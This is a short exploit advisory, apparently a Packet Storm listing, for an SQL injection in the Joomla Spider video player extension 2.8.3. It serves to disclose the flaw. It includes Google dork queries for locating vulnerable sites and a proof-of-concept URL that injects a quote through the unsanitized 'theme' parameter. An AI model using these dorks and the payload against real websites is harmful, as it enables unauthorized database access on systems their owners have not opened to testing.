Joomla Spider video player version 2.8.3 suffers from a remote SQL injection vulnerability.
6ed2b156ade9720a425662be9c1826fcea87daa3ea39ee657f3b9d9512527ac2######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
# Dork Google: inurl:/component/spidervideoplayer
inurl:option=com_spidervideoplayer
# Date : 2014-08-26
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
"theme" variable is not sanitized.
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed